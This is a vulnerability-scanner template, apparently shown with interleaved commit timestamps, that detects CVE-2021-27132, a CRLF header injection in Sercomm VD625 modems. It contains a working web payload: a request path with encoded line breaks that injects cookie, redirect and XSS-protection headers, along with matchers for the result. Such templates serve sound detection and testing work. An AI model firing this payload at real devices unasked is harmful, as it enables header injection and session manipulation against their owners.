2021-03-01 14:15:30 +00:00
id : CVE-2021-27132
info :
2022-05-18 20:58:07 +00:00
name : Sercomm VD625 Smart Modems - CRLF Injection
2021-03-01 14:15:30 +00:00
author : geeknik
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-18 20:58:07 +00:00
description : Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header.
2022-04-22 10:38:41 +00:00
reference :
- https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
- http://sercomm.com
2022-05-18 20:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-27132
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-27132
cwe-id : CWE-74
2023-04-12 10:55:48 +00:00
epss-score : 0.03379
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : sercomm
product : agcombo_vd625_firmware
tags : cve,cve2021,crlf,injection
2021-03-01 14:15:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-01 14:15:30 +00:00
- method : GET
path :
2022-06-06 10:40:15 +00:00
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
2021-03-01 14:15:30 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-03-01 14:15:30 +00:00
words :
- "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test"
2022-06-06 10:40:15 +00:00
- "Location: interact.sh"
2021-03-01 20:34:15 +00:00
- "X-XSS-Protection:0"
2021-03-01 14:15:30 +00:00
condition : and
2023-07-11 19:49:27 +00:00
- type : status
part : header
status :
- 404